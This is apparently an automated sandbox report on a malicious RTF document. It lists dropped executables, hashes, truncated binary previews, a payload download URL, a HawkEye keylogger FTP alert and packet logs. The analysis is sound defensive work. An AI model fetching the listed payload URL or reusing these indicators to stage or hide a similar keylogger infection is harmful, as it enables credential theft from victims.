                                                          PO_701_36_01_27.docGet hashmaliciousBrowse
                                                            IMG_51067.doc__.rtfGet hashmaliciousBrowse
                                                              New Order 09022021.docGet hashmaliciousBrowse
                                                                deliverysorders.docGet hashmaliciousBrowse
                                                                  IMG_Scanned_67022.docGet hashmaliciousBrowse
                                                                    ORD005271444_0.docGet hashmaliciousBrowse
                                                                      INV00004423.docGet hashmaliciousBrowse
                                                                        DTBT760087673.docGet hashmaliciousBrowse
                                                                          IMG_33687.docGet hashmaliciousBrowse
                                                                            IMG_1660392.docGet hashmaliciousBrowse
                                                                              Purchase Order No. 3109 Dated 28.01.2021.docGet hashmaliciousBrowse
                                                                                Order_130577.docGet hashmaliciousBrowse
                                                                                  IMG-79108.docGet hashmaliciousBrowse
                                                                                    IMG-6661.docGet hashmaliciousBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:downloaded
                                                                                      Size (bytes):1383936
                                                                                      Entropy (8bit):6.545078865817934
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:inGai6Dban0+uhHJQNmj3X2rhK1+pSRs/8Mz3g:T6iuNH261Rs/
                                                                                      MD5:FA0A3ED04EEC65D6D3FB55AA7D2497C1
                                                                                      SHA1:89AAFE0CFEC4ECC13FD7F255B1E6E8AF903DDBD0
                                                                                      SHA-256:2C6DF9A84B482C1DD1AF8EE142CCDFEAB23234A8507F3CC637AEE9161A6C58B8
                                                                                      SHA-512:DA69F632F0BC9789BF17D1CFDBF09C991098227A23E3BD273C1C5720B53D9EB81B99C0121F632CBC2EB25ECE51E6548470DC2FD0ED64D37F88A58A005B1C7B3D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Reputation:low
                                                                                      IE Cache URL:http://vecvietnam.com.vn/xpen3/09867654270721.PDF.exe
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<.............................)... ...@....@.. ....................................`.................................|)..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........1..............................................................J.j......1X...n}..|.0._.foa..^%M..$C1..p..4.......].....0s.(.......I:..l.*.+D.W..u..qN|,.I.V.Ht.'....jg Um..F.]..&..D..}./..`....!9...wq.v..:..9.!Y.....C:vz..v8...<..o....[.v.?[g ....\...~.U&^ueW..L......D.w.e7.V..7G.3tr................ .|....x..-..].<.k....4..S....3\....g.U!...o..P6{.."..hH...=./.5..'A.M.o..`.$j.K8."......D.6.v...u[..V-a!...#?.x...O'.+N./..9s}..J.k)@.E.z.-...I..cv.../..&
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{238E66D8-299E-4B99-A605-44EE5B79BCDD}.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.05390218305374581
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B83DDB5-D064-451A-A615-F9D5A3E063B2}.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1536
                                                                                      Entropy (8bit):1.35503378748317
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbq:IiiiiiiiiifdLloZQc8++lsJe1Mzp
                                                                                      MD5:3205DD73710421B95A8AF86F27D81253
                                                                                      SHA1:02A295749B1613B87042B49C12E1FCC8D0EC532C
                                                                                      SHA-256:833259425C29070C37939264C63C138B04116B98E315E4A49B32488539E96AA5
                                                                                      SHA-512:48F6DC9FBACDEC454524F8CFBA1DF124236098D8AED22BB0D8664B872F1F182CB5ECBABBAE42718C2A922BF57F7452F7D44ECDFE613CA2ADFEF058840E7C6F8F
                                                                                      Malicious:false
                                                                                      Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2185495-5638-43A1-A616-4B202C23444A}.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):222384
                                                                                      Entropy (8bit):3.709483134949932
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:hInz7rlqTKfkx9akY7jt71AJHC2yuPNY7ogOYeF3JzU/jvL8tJ//:hiDUKfKozjAJrlPmgLF5MSh
                                                                                      MD5:7357D4D835CCA92021169389B613BC73
                                                                                      SHA1:8A8F62164C39D5D54FE29B9EC52D33D0D1A3E378
                                                                                      SHA-256:898A57398870413055747E5BCC4DD97655E0D45D05057FC03100E2A76151EDD8
                                                                                      SHA-512:58D835C92BEAFFAADD19B9EE8C5426AE49EA3809D41EF6DC05F54B720DC3C4DA1839E06A90F95010B04177D0B63652746DDFE63FF20F1C998C2F9A4B62E96526
                                                                                      Malicious:false
                                                                                      Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .q.B.b.0.z.x.y.6.M.8.o.e.h.G.3.A.a.Y.h.3.t.6.v.w.h.T.g.P.N.P.F.q.r.r.K.X._.G.C.s.Z.m.y.v.b.P.8.U.0.9.I.4.N.2.v.X.7.e.q.o................................................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>............... . . . . . .6.2.5.2.6.1.6.2.6.2.5.2.6.1.6.2._.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U
                                                                                      C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                      Process:C:\Users\user\AppData\Roaming\name.exe
                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):41136
                                                                                      Entropy (8bit):6.155874259465173
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:C/xHdGK81tLhBLVKS7xdgoPKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+aPZCM:+Hj81t/0qdrY6Iq8KDLJqisEBuot
                                                                                      MD5:BB85AA6D90A4157ED799257072B265FF
                                                                                      SHA1:F97DA28D82E9D81672C78FFBE03123E985E7F6D4
                                                                                      SHA-256:815FD29D891CB94418BB0CDC44D5095230989FE9DA58421319FCD57E458E39A9
                                                                                      SHA-512:17EBB032F3663D7971DBE13EE89C82D2D4CF3375C0DA44021D35178DE046FCB2BFB5F89E7CFC68CF4E8570D21FDD9876759443BFDE6CFF5A2A354D2361E64F1E
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: Paiement de facture.doc, Detection: malicious, Browse
                                                                                      • Filename: ORDER SPECIFICATION.doc, Detection: malicious, Browse
                                                                                      • Filename: UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864888.doc, Detection: malicious, Browse
                                                                                      • Filename: UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864.doc, Detection: malicious, Browse
                                                                                      • Filename: Quotations73280126721_Oriental_Fastech_Manufacturing.doc, Detection: malicious, Browse
                                                                                      • Filename: PurchaseOrder78902AprilOrderNewRoundBars.doc, Detection: malicious, Browse
                                                                                      • Filename: PO_701_36_01_27.doc, Detection: malicious, Browse
                                                                                      • Filename: IMG_51067.doc__.rtf, Detection: malicious, Browse
                                                                                      • Filename: New Order 09022021.doc, Detection: malicious, Browse
                                                                                      • Filename: deliverysorders.doc, Detection: malicious, Browse
                                                                                      • Filename: IMG_Scanned_67022.doc, Detection: malicious, Browse
                                                                                      • Filename: ORD005271444_0.doc, Detection: malicious, Browse
                                                                                      • Filename: INV00004423.doc, Detection: malicious, Browse
                                                                                      • Filename: DTBT760087673.doc, Detection: malicious, Browse
                                                                                      • Filename: IMG_33687.doc, Detection: malicious, Browse
                                                                                      • Filename: IMG_1660392.doc, Detection: malicious, Browse
                                                                                      • Filename: Purchase Order No. 3109 Dated 28.01.2021.doc, Detection: malicious, Browse
                                                                                      • Filename: Order_130577.doc, Detection: malicious, Browse
                                                                                      • Filename: IMG-79108.doc, Detection: malicious, Browse
                                                                                      • Filename: IMG-6661.doc, Detection: malicious, Browse
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W..............0..T.........."r... ........@.. ...............................[....`..................................q..O....................b...>...........p............................................... ............... ..H............text...(R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B.................r......H........"...J...........m.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o....o ....4(....o....(....o....o....o!.....(....rm..ps"...o....(#........($....o%....ry..p......%.r...p.%.(.....(....(&....('.......o(...(&........*.*................"..()...*..{Q...-...}Q.....(*...(....(+....(*...*"..(,...*..(....*..(-....r...p.(....o/...s....}T...*....0.. .......~S...-.s
                                                                                      C:\Users\user\AppData\Local\Temp\bhv53DC.tmp
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x63a10f1a, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                      Category:dropped
                                                                                      Size (bytes):21037056
                                                                                      Entropy (8bit):1.1463834484624762
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:G41U91o2I+0mZ5lThHLLGpHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:G4EXd1LoHqqEXwPW+RHA6m1fN
                                                                                      MD5:E645A86C0BECF0D017469128088487DE
                                                                                      SHA1:8569671565B972EF80D3956930CBD1A5E4238162
                                                                                      SHA-256:6228287DC6D1A0CB345D495AEC250FFF69D18394472806FEA2A12AA9F2655C59
                                                                                      SHA-512:4C7CC36CEBC16802D34C1C7BDD87CFCB4DB43217C5AC1F78B3D6B9F2AB425D2B9D4B780898CDAFDAEA25AEEE1A3AA961A4324BB3A05D4DD629395F6B7BC71E7E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: c...... ........................u......................s............x..%....x.......................................u..............................................................................................$............................................................................................................................... .......7....x......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):1.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Qn:Qn
                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: ..
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\280072109764552.LNK
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Wed Jul 28 23:00:39 2021, length=2202571, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2078
                                                                                      Entropy (8bit):4.518299053002962
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8nn/XTFGqJRMwJZJKQh2nn/XTFGqJRMwJZJKQ/:8n/XJGqJCwTJKQh2n/XJGqJCwTJKQ/
                                                                                      MD5:FDE744CEF016E7DAA5DA08F2B71138CC
                                                                                      SHA1:3D6092AC3EDEF45AF08F0E39E694944F83BC6FE2
                                                                                      SHA-256:3D4407EEEDBAAC0882912745F968F53A43D76383B636A762635D7BD76EE8A9BE
                                                                                      SHA-512:763B72143D0A339034F2C6E2DE4D5D3DE7185FF891430AEA37CCF0D0FC3EFCDA56DF65214FBB4840FFDDC0AC3EBA73AF466218A4C1F84AA8341EA561346AF866
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: L..................F.... ...8.r..{..8.r..{..B.;......!..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2..!..R.. .280072~1.DOC..T.......Q.y.Q.y*...8.....................2.8.0.0.7.2.1.0.9.7.6.4.5.5.2...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop\280072109764552.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.8.0.0.7.2.1.0.9.7.6.4.5.5.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......783875..........D_....3N...W...9F.C.........
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):83
                                                                                      Entropy (8bit):4.166164961457805
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:M1XoXMJQQwltSXMJQQwlmX1XoXMJQQwlv:MiXw0SXwwXwy
                                                                                      MD5:D50CD7F18A3AC9442290FC4BEB5A10F9
                                                                                      SHA1:4C7585A1E0B987034382D26D99104BEABD6B3DEE
                                                                                      SHA-256:F58D9EB8912ED9BC8AEFF531B3104846F1125AC9CA1F9401C0D97ABAB28F602D
                                                                                      SHA-512:9D051D32591D223DA36287D5251ED45F3B7D7F31585C1CE25D04EDB22271AB47B497D520F7B111766D9D7111E7C6170DBBEA49FA80B30660578474EC43E31E1D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: [doc]..280072109764552.LNK=0..280072109764552.LNK=0..[doc]..280072109764552.LNK=0..
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.4311600611816426
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                                                                      MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                                                                      SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                                                                      SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                                                                      SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .user..................................................A.l.b.u.s.............p.......................................P......................z...............x...
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):1.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Qn:Qn
                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: ..
                                                                                      C:\Users\user\AppData\Roaming\name.exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1383936
                                                                                      Entropy (8bit):6.545078865817934
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:inGai6Dban0+uhHJQNmj3X2rhK1+pSRs/8Mz3g:T6iuNH261Rs/
                                                                                      MD5:FA0A3ED04EEC65D6D3FB55AA7D2497C1
                                                                                      SHA1:89AAFE0CFEC4ECC13FD7F255B1E6E8AF903DDBD0
                                                                                      SHA-256:2C6DF9A84B482C1DD1AF8EE142CCDFEAB23234A8507F3CC637AEE9161A6C58B8
                                                                                      SHA-512:DA69F632F0BC9789BF17D1CFDBF09C991098227A23E3BD273C1C5720B53D9EB81B99C0121F632CBC2EB25ECE51E6548470DC2FD0ED64D37F88A58A005B1C7B3D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<.............................)... ...@....@.. ....................................`.................................|)..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........1..............................................................J.j......1X...n}..|.0._.foa..^%M..$C1..p..4.......].....0s.(.......I:..l.*.+D.W..u..qN|,.I.V.Ht.'....jg Um..F.]..&..D..}./..`....!9...wq.v..:..9.!Y.....C:vz..v8...<..o....[.v.?[g ....\...~.U&^ueW..L......D.w.e7.V..7G.3tr................ .|....x..-..].<.k....4..S....3\....g.U!...o..P6{.."..hH...=./.5..'A.M.o..`.$j.K8."......D.6.v...u[..V-a!...#?.x...O'.+N./..9s}..J.k)@.E.z.-...I..cv.../..&
                                                                                      C:\Users\user\AppData\Roaming\pid.txt
                                                                                      Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):2.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:i:i
                                                                                      MD5:60AD83801910EC976590F69F638E0D6D
                                                                                      SHA1:80C06016B31FFA3B0D157BEF344A5FE03CC7FD75
                                                                                      SHA-256:A8302321E60791AE50456D85F1BB8B3EF92FBFB23A081DA45EF468BE922AE9B1
                                                                                      SHA-512:58B7EC6BFCB9960F48BD5D9AF6C0F53B85E1D16F0E4C2F135C9507143C9261B54E888FBA14EE08CA72199790A9D471DA4FE81F31A9664438C2EA0D3B84958CF1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 2964
                                                                                      C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                      Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):49
                                                                                      Entropy (8bit):4.295746773031725
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:oNXp4E2J5xAIOWRxRI0dAn:oNP23f5RndA
                                                                                      MD5:2D61FD97BB78C3900DD39B26447C5C1A
                                                                                      SHA1:117F447B8159E31DF5B4422F07B04267231B4A8E
                                                                                      SHA-256:49A7F6995E282A8964916CFCB0A1982BC5418EF85AB7224EBC420C21281B91C9
                                                                                      SHA-512:B57128EE990D8F213045ECE49D7F8C3283415B1DAB22C79D3F39EF98D63F0A778D9CB095597FC57ED72F74C85036E59CCA2E7BAD3963E5758C59CB9ACE4518DF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                      C:\Users\user\Desktop\~$0072109764552.doc
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.4311600611816426
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                                                                      MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                                                                      SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                                                                      SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                                                                      SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .user..................................................A.l.b.u.s.............p.......................................P......................z...............x...

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:Rich Text Format data, unknown version
                                                                                      Entropy (8bit):3.788704695837854
                                                                                      TrID:
                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                      File name:280072109764552.doc
                                                                                      File size:2202571
                                                                                      MD5:ae01f0cc63c8a3b7bb239976c56788c3
                                                                                      SHA1:cd86bb62ab645cab4d20ec8a931ca9e84801ea36
                                                                                      SHA256:fde845dc869db03ce766a34d4d325cfb60ea5e605244e823fcfea5b3135aacb7
                                                                                      SHA512:ec2dec52a3210a3d7df8d19fb9fe92051d88f08c75f4d97a7376f89050aab13c1ace29206fa162eea37de9d4fa0a1e39146471dd4dd14d29cc9084cd442d8a7a
                                                                                      SSDEEP:12288:Bkw1w+//ay0/EFUHnrtIJBa/BtfOLaZQWrS+H8UErBQLeugE:mw6uay0/ECGJSfOLTmwrOgE
                                                                                      File Content Preview:{\rtf9038{\object23144237 \'' \objlink96638503\objupdate4984801149848011\objw3937\objh7665{\*\objdata297062 {{{{{{{{{{{{{{{{{{{{{{\bin000000000 {\*\objdata297062 } \a

                                                                                      File Icon

                                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                                      Static RTF Info

                                                                                      Objects

                                                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                      0000000EAhno
                                                                                      1000000AEh2embedded21H85GTZHAz1046016no

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      07/28/21-17:02:02.953811TCP2020410ET TROJAN HawkEye Keylogger FTP4917121192.168.2.2245.141.152.18

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jul 28, 2021 17:01:16.210468054 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.446532965 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.446619987 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.446929932 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.679229021 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679267883 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679291010 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679323912 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.679331064 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679347992 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.679357052 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679364920 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.679385900 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.679433107 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679455042 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679465055 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.679478884 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.679508924 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679526091 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679544926 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.679558992 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.679590940 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679610968 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.679634094 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.679646015 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.689784050 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922131062 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922183990 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922209024 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922229052 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922254086 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922276974 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922301054 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922319889 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922343969 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922348976 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922369003 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922374964 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922405958 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922431946 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922435999 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922456026 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922471046 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922478914 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922502995 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922509909 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922533989 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922561884 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922594070 CEST8049167103.255.237.180192.168.2.22
